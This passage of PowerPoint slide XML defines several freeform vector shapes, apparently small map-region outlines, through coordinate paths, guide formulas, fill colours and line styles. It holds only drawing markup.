                      <a:pt x="28" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="67"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36249" name="Freeform 382"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1275" y="2656"/>
                <a:ext cx="63" cy="67"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 34 w 63"/>
                  <a:gd name="T1" fmla="*/ 67 h 67"/>
                  <a:gd name="T2" fmla="*/ 33 w 63"/>
                  <a:gd name="T3" fmla="*/ 67 h 67"/>
                  <a:gd name="T4" fmla="*/ 26 w 63"/>
                  <a:gd name="T5" fmla="*/ 64 h 67"/>
                  <a:gd name="T6" fmla="*/ 22 w 63"/>
                  <a:gd name="T7" fmla="*/ 65 h 67"/>
                  <a:gd name="T8" fmla="*/ 16 w 63"/>
                  <a:gd name="T9" fmla="*/ 64 h 67"/>
                  <a:gd name="T10" fmla="*/ 12 w 63"/>
                  <a:gd name="T11" fmla="*/ 63 h 67"/>
                  <a:gd name="T12" fmla="*/ 6 w 63"/>
                  <a:gd name="T13" fmla="*/ 58 h 67"/>
                  <a:gd name="T14" fmla="*/ 2 w 63"/>
                  <a:gd name="T15" fmla="*/ 55 h 67"/>
                  <a:gd name="T16" fmla="*/ 2 w 63"/>
                  <a:gd name="T17" fmla="*/ 51 h 67"/>
                  <a:gd name="T18" fmla="*/ 1 w 63"/>
                  <a:gd name="T19" fmla="*/ 47 h 67"/>
                  <a:gd name="T20" fmla="*/ 3 w 63"/>
                  <a:gd name="T21" fmla="*/ 46 h 67"/>
                  <a:gd name="T22" fmla="*/ 0 w 63"/>
                  <a:gd name="T23" fmla="*/ 43 h 67"/>
                  <a:gd name="T24" fmla="*/ 8 w 63"/>
                  <a:gd name="T25" fmla="*/ 29 h 67"/>
                  <a:gd name="T26" fmla="*/ 16 w 63"/>
                  <a:gd name="T27" fmla="*/ 29 h 67"/>
                  <a:gd name="T28" fmla="*/ 28 w 63"/>
                  <a:gd name="T29" fmla="*/ 29 h 67"/>
                  <a:gd name="T30" fmla="*/ 30 w 63"/>
                  <a:gd name="T31" fmla="*/ 24 h 67"/>
                  <a:gd name="T32" fmla="*/ 26 w 63"/>
                  <a:gd name="T33" fmla="*/ 22 h 67"/>
                  <a:gd name="T34" fmla="*/ 23 w 63"/>
                  <a:gd name="T35" fmla="*/ 17 h 67"/>
                  <a:gd name="T36" fmla="*/ 19 w 63"/>
                  <a:gd name="T37" fmla="*/ 16 h 67"/>
                  <a:gd name="T38" fmla="*/ 15 w 63"/>
                  <a:gd name="T39" fmla="*/ 12 h 67"/>
                  <a:gd name="T40" fmla="*/ 13 w 63"/>
                  <a:gd name="T41" fmla="*/ 10 h 67"/>
                  <a:gd name="T42" fmla="*/ 20 w 63"/>
                  <a:gd name="T43" fmla="*/ 10 h 67"/>
                  <a:gd name="T44" fmla="*/ 20 w 63"/>
                  <a:gd name="T45" fmla="*/ 0 h 67"/>
                  <a:gd name="T46" fmla="*/ 33 w 63"/>
                  <a:gd name="T47" fmla="*/ 0 h 67"/>
                  <a:gd name="T48" fmla="*/ 49 w 63"/>
                  <a:gd name="T49" fmla="*/ 1 h 67"/>
                  <a:gd name="T50" fmla="*/ 48 w 63"/>
                  <a:gd name="T51" fmla="*/ 33 h 67"/>
                  <a:gd name="T52" fmla="*/ 53 w 63"/>
                  <a:gd name="T53" fmla="*/ 32 h 67"/>
                  <a:gd name="T54" fmla="*/ 55 w 63"/>
                  <a:gd name="T55" fmla="*/ 33 h 67"/>
                  <a:gd name="T56" fmla="*/ 57 w 63"/>
                  <a:gd name="T57" fmla="*/ 35 h 67"/>
                  <a:gd name="T58" fmla="*/ 58 w 63"/>
                  <a:gd name="T59" fmla="*/ 34 h 67"/>
                  <a:gd name="T60" fmla="*/ 58 w 63"/>
                  <a:gd name="T61" fmla="*/ 31 h 67"/>
                  <a:gd name="T62" fmla="*/ 60 w 63"/>
                  <a:gd name="T63" fmla="*/ 32 h 67"/>
                  <a:gd name="T64" fmla="*/ 63 w 63"/>
                  <a:gd name="T65" fmla="*/ 35 h 67"/>
                  <a:gd name="T66" fmla="*/ 53 w 63"/>
                  <a:gd name="T67" fmla="*/ 44 h 67"/>
                  <a:gd name="T68" fmla="*/ 49 w 63"/>
                  <a:gd name="T69" fmla="*/ 46 h 67"/>
                  <a:gd name="T70" fmla="*/ 48 w 63"/>
                  <a:gd name="T71" fmla="*/ 49 h 67"/>
                  <a:gd name="T72" fmla="*/ 49 w 63"/>
                  <a:gd name="T73" fmla="*/ 54 h 67"/>
                  <a:gd name="T74" fmla="*/ 46 w 63"/>
                  <a:gd name="T75" fmla="*/ 56 h 67"/>
                  <a:gd name="T76" fmla="*/ 43 w 63"/>
                  <a:gd name="T77" fmla="*/ 56 h 67"/>
                  <a:gd name="T78" fmla="*/ 42 w 63"/>
                  <a:gd name="T79" fmla="*/ 58 h 67"/>
                  <a:gd name="T80" fmla="*/ 43 w 63"/>
                  <a:gd name="T81" fmla="*/ 59 h 67"/>
                  <a:gd name="T82" fmla="*/ 41 w 63"/>
                  <a:gd name="T83" fmla="*/ 60 h 67"/>
                  <a:gd name="T84" fmla="*/ 40 w 63"/>
                  <a:gd name="T85" fmla="*/ 62 h 67"/>
                  <a:gd name="T86" fmla="*/ 38 w 63"/>
                  <a:gd name="T87" fmla="*/ 62 h 67"/>
                  <a:gd name="T88" fmla="*/ 34 w 63"/>
                  <a:gd name="T89" fmla="*/ 66 h 67"/>
                  <a:gd name="T90" fmla="*/ 34 w 63"/>
                  <a:gd name="T91" fmla="*/ 67 h 67"/>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63"/>
                  <a:gd name="T139" fmla="*/ 0 h 67"/>
                  <a:gd name="T140" fmla="*/ 63 w 63"/>
                  <a:gd name="T141" fmla="*/ 67 h 67"/>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63" h="67">
                    <a:moveTo>
                      <a:pt x="34" y="67"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="33" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="67"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36250" name="Freeform 383"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3477" y="2447"/>
                <a:ext cx="31" cy="27"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 22 w 31"/>
                  <a:gd name="T1" fmla="*/ 0 h 27"/>
                  <a:gd name="T2" fmla="*/ 23 w 31"/>
                  <a:gd name="T3" fmla="*/ 2 h 27"/>
                  <a:gd name="T4" fmla="*/ 24 w 31"/>
                  <a:gd name="T5" fmla="*/ 7 h 27"/>
                  <a:gd name="T6" fmla="*/ 21 w 31"/>
                  <a:gd name="T7" fmla="*/ 7 h 27"/>
                  <a:gd name="T8" fmla="*/ 18 w 31"/>
                  <a:gd name="T9" fmla="*/ 11 h 27"/>
                  <a:gd name="T10" fmla="*/ 21 w 31"/>
                  <a:gd name="T11" fmla="*/ 13 h 27"/>
                  <a:gd name="T12" fmla="*/ 24 w 31"/>
                  <a:gd name="T13" fmla="*/ 11 h 27"/>
                  <a:gd name="T14" fmla="*/ 26 w 31"/>
                  <a:gd name="T15" fmla="*/ 11 h 27"/>
                  <a:gd name="T16" fmla="*/ 31 w 31"/>
                  <a:gd name="T17" fmla="*/ 26 h 27"/>
                  <a:gd name="T18" fmla="*/ 26 w 31"/>
                  <a:gd name="T19" fmla="*/ 27 h 27"/>
                  <a:gd name="T20" fmla="*/ 18 w 31"/>
                  <a:gd name="T21" fmla="*/ 26 h 27"/>
                  <a:gd name="T22" fmla="*/ 17 w 31"/>
                  <a:gd name="T23" fmla="*/ 24 h 27"/>
                  <a:gd name="T24" fmla="*/ 15 w 31"/>
                  <a:gd name="T25" fmla="*/ 19 h 27"/>
                  <a:gd name="T26" fmla="*/ 12 w 31"/>
                  <a:gd name="T27" fmla="*/ 19 h 27"/>
                  <a:gd name="T28" fmla="*/ 0 w 31"/>
                  <a:gd name="T29" fmla="*/ 17 h 27"/>
                  <a:gd name="T30" fmla="*/ 4 w 31"/>
                  <a:gd name="T31" fmla="*/ 12 h 27"/>
                  <a:gd name="T32" fmla="*/ 7 w 31"/>
                  <a:gd name="T33" fmla="*/ 7 h 27"/>
                  <a:gd name="T34" fmla="*/ 10 w 31"/>
                  <a:gd name="T35" fmla="*/ 2 h 27"/>
                  <a:gd name="T36" fmla="*/ 13 w 31"/>
                  <a:gd name="T37" fmla="*/ 1 h 27"/>
                  <a:gd name="T38" fmla="*/ 22 w 31"/>
                  <a:gd name="T39" fmla="*/ 0 h 27"/>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31"/>
                  <a:gd name="T61" fmla="*/ 0 h 27"/>
                  <a:gd name="T62" fmla="*/ 31 w 31"/>
                  <a:gd name="T63" fmla="*/ 27 h 27"/>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31" h="27">
                    <a:moveTo>
                      <a:pt x="22" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="23" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36251" name="Freeform 384"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3477" y="2447"/>
                <a:ext cx="31" cy="27"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 22 w 31"/>
                  <a:gd name="T1" fmla="*/ 0 h 27"/>
                  <a:gd name="T2" fmla="*/ 23 w 31"/>
                  <a:gd name="T3" fmla="*/ 2 h 27"/>
                  <a:gd name="T4" fmla="*/ 24 w 31"/>
                  <a:gd name="T5" fmla="*/ 7 h 27"/>
                  <a:gd name="T6" fmla="*/ 21 w 31"/>
                  <a:gd name="T7" fmla="*/ 7 h 27"/>
                  <a:gd name="T8" fmla="*/ 18 w 31"/>
                  <a:gd name="T9" fmla="*/ 11 h 27"/>
                  <a:gd name="T10" fmla="*/ 21 w 31"/>
                  <a:gd name="T11" fmla="*/ 13 h 27"/>
                  <a:gd name="T12" fmla="*/ 24 w 31"/>
                  <a:gd name="T13" fmla="*/ 11 h 27"/>
                  <a:gd name="T14" fmla="*/ 26 w 31"/>
                  <a:gd name="T15" fmla="*/ 11 h 27"/>
                  <a:gd name="T16" fmla="*/ 31 w 31"/>
                  <a:gd name="T17" fmla="*/ 26 h 27"/>
                  <a:gd name="T18" fmla="*/ 26 w 31"/>
                  <a:gd name="T19" fmla="*/ 27 h 27"/>
                  <a:gd name="T20" fmla="*/ 18 w 31"/>
                  <a:gd name="T21" fmla="*/ 26 h 27"/>
                  <a:gd name="T22" fmla="*/ 17 w 31"/>
                  <a:gd name="T23" fmla="*/ 24 h 27"/>
                  <a:gd name="T24" fmla="*/ 15 w 31"/>
                  <a:gd name="T25" fmla="*/ 19 h 27"/>
                  <a:gd name="T26" fmla="*/ 12 w 31"/>
                  <a:gd name="T27" fmla="*/ 19 h 27"/>
                  <a:gd name="T28" fmla="*/ 0 w 31"/>
                  <a:gd name="T29" fmla="*/ 17 h 27"/>
                  <a:gd name="T30" fmla="*/ 4 w 31"/>
                  <a:gd name="T31" fmla="*/ 12 h 27"/>
                  <a:gd name="T32" fmla="*/ 7 w 31"/>
                  <a:gd name="T33" fmla="*/ 7 h 27"/>
                  <a:gd name="T34" fmla="*/ 10 w 31"/>
                  <a:gd name="T35" fmla="*/ 2 h 27"/>
                  <a:gd name="T36" fmla="*/ 13 w 31"/>
                  <a:gd name="T37" fmla="*/ 1 h 27"/>
                  <a:gd name="T38" fmla="*/ 22 w 31"/>
                  <a:gd name="T39" fmla="*/ 0 h 27"/>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31"/>
                  <a:gd name="T61" fmla="*/ 0 h 27"/>
                  <a:gd name="T62" fmla="*/ 31 w 31"/>
                  <a:gd name="T63" fmla="*/ 27 h 27"/>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31" h="27">
                    <a:moveTo>
                      <a:pt x="22" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="23" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36252" name="Freeform 385"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3561" y="2513"/>
                <a:ext cx="127" cy="163"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 71 w 127"/>
                  <a:gd name="T1" fmla="*/ 1 h 163"/>
                  <a:gd name="T2" fmla="*/ 73 w 127"/>
                  <a:gd name="T3" fmla="*/ 6 h 163"/>
                  <a:gd name="T4" fmla="*/ 69 w 127"/>
                  <a:gd name="T5" fmla="*/ 13 h 163"/>
                  <a:gd name="T6" fmla="*/ 68 w 127"/>
                  <a:gd name="T7" fmla="*/ 13 h 163"/>
                  <a:gd name="T8" fmla="*/ 68 w 127"/>
                  <a:gd name="T9" fmla="*/ 9 h 163"/>
                  <a:gd name="T10" fmla="*/ 69 w 127"/>
                  <a:gd name="T11" fmla="*/ 5 h 163"/>
                  <a:gd name="T12" fmla="*/ 73 w 127"/>
                  <a:gd name="T13" fmla="*/ 25 h 163"/>
                  <a:gd name="T14" fmla="*/ 79 w 127"/>
                  <a:gd name="T15" fmla="*/ 34 h 163"/>
                  <a:gd name="T16" fmla="*/ 90 w 127"/>
                  <a:gd name="T17" fmla="*/ 42 h 163"/>
                  <a:gd name="T18" fmla="*/ 100 w 127"/>
                  <a:gd name="T19" fmla="*/ 47 h 163"/>
                  <a:gd name="T20" fmla="*/ 106 w 127"/>
                  <a:gd name="T21" fmla="*/ 47 h 163"/>
                  <a:gd name="T22" fmla="*/ 115 w 127"/>
                  <a:gd name="T23" fmla="*/ 56 h 163"/>
                  <a:gd name="T24" fmla="*/ 121 w 127"/>
                  <a:gd name="T25" fmla="*/ 64 h 163"/>
                  <a:gd name="T26" fmla="*/ 127 w 127"/>
                  <a:gd name="T27" fmla="*/ 69 h 163"/>
                  <a:gd name="T28" fmla="*/ 118 w 127"/>
                  <a:gd name="T29" fmla="*/ 82 h 163"/>
                  <a:gd name="T30" fmla="*/ 106 w 127"/>
                  <a:gd name="T31" fmla="*/ 100 h 163"/>
                  <a:gd name="T32" fmla="*/ 101 w 127"/>
                  <a:gd name="T33" fmla="*/ 101 h 163"/>
                  <a:gd name="T34" fmla="*/ 97 w 127"/>
                  <a:gd name="T35" fmla="*/ 100 h 163"/>
                  <a:gd name="T36" fmla="*/ 95 w 127"/>
                  <a:gd name="T37" fmla="*/ 113 h 163"/>
                  <a:gd name="T38" fmla="*/ 96 w 127"/>
                  <a:gd name="T39" fmla="*/ 123 h 163"/>
                  <a:gd name="T40" fmla="*/ 85 w 127"/>
                  <a:gd name="T41" fmla="*/ 125 h 163"/>
                  <a:gd name="T42" fmla="*/ 78 w 127"/>
                  <a:gd name="T43" fmla="*/ 129 h 163"/>
                  <a:gd name="T44" fmla="*/ 75 w 127"/>
                  <a:gd name="T45" fmla="*/ 137 h 163"/>
                  <a:gd name="T46" fmla="*/ 71 w 127"/>
                  <a:gd name="T47" fmla="*/ 141 h 163"/>
                  <a:gd name="T48" fmla="*/ 65 w 127"/>
                  <a:gd name="T49" fmla="*/ 142 h 163"/>
                  <a:gd name="T50" fmla="*/ 60 w 127"/>
                  <a:gd name="T51" fmla="*/ 142 h 163"/>
                  <a:gd name="T52" fmla="*/ 55 w 127"/>
                  <a:gd name="T53" fmla="*/ 146 h 163"/>
                  <a:gd name="T54" fmla="*/ 55 w 127"/>
                  <a:gd name="T55" fmla="*/ 153 h 163"/>
                  <a:gd name="T56" fmla="*/ 49 w 127"/>
                  <a:gd name="T57" fmla="*/ 158 h 163"/>
                  <a:gd name="T58" fmla="*/ 41 w 127"/>
                  <a:gd name="T59" fmla="*/ 157 h 163"/>
                  <a:gd name="T60" fmla="*/ 30 w 127"/>
                  <a:gd name="T61" fmla="*/ 159 h 163"/>
                  <a:gd name="T62" fmla="*/ 22 w 127"/>
                  <a:gd name="T63" fmla="*/ 162 h 163"/>
                  <a:gd name="T64" fmla="*/ 18 w 127"/>
                  <a:gd name="T65" fmla="*/ 161 h 163"/>
                  <a:gd name="T66" fmla="*/ 14 w 127"/>
                  <a:gd name="T67" fmla="*/ 153 h 163"/>
                  <a:gd name="T68" fmla="*/ 7 w 127"/>
                  <a:gd name="T69" fmla="*/ 141 h 163"/>
                  <a:gd name="T70" fmla="*/ 1 w 127"/>
                  <a:gd name="T71" fmla="*/ 129 h 163"/>
                  <a:gd name="T72" fmla="*/ 12 w 127"/>
                  <a:gd name="T73" fmla="*/ 118 h 163"/>
                  <a:gd name="T74" fmla="*/ 67 w 127"/>
                  <a:gd name="T75" fmla="*/ 86 h 163"/>
                  <a:gd name="T76" fmla="*/ 62 w 127"/>
                  <a:gd name="T77" fmla="*/ 68 h 163"/>
                  <a:gd name="T78" fmla="*/ 61 w 127"/>
                  <a:gd name="T79" fmla="*/ 51 h 163"/>
                  <a:gd name="T80" fmla="*/ 65 w 127"/>
                  <a:gd name="T81" fmla="*/ 39 h 163"/>
                  <a:gd name="T82" fmla="*/ 66 w 127"/>
                  <a:gd name="T83" fmla="*/ 26 h 163"/>
                  <a:gd name="T84" fmla="*/ 70 w 127"/>
                  <a:gd name="T85" fmla="*/ 23 h 163"/>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27"/>
                  <a:gd name="T130" fmla="*/ 0 h 163"/>
                  <a:gd name="T131" fmla="*/ 127 w 127"/>
                  <a:gd name="T132" fmla="*/ 163 h 163"/>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27" h="163">
                    <a:moveTo>
                      <a:pt x="69" y="5"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="71" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="5"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="73" y="23"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="73" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
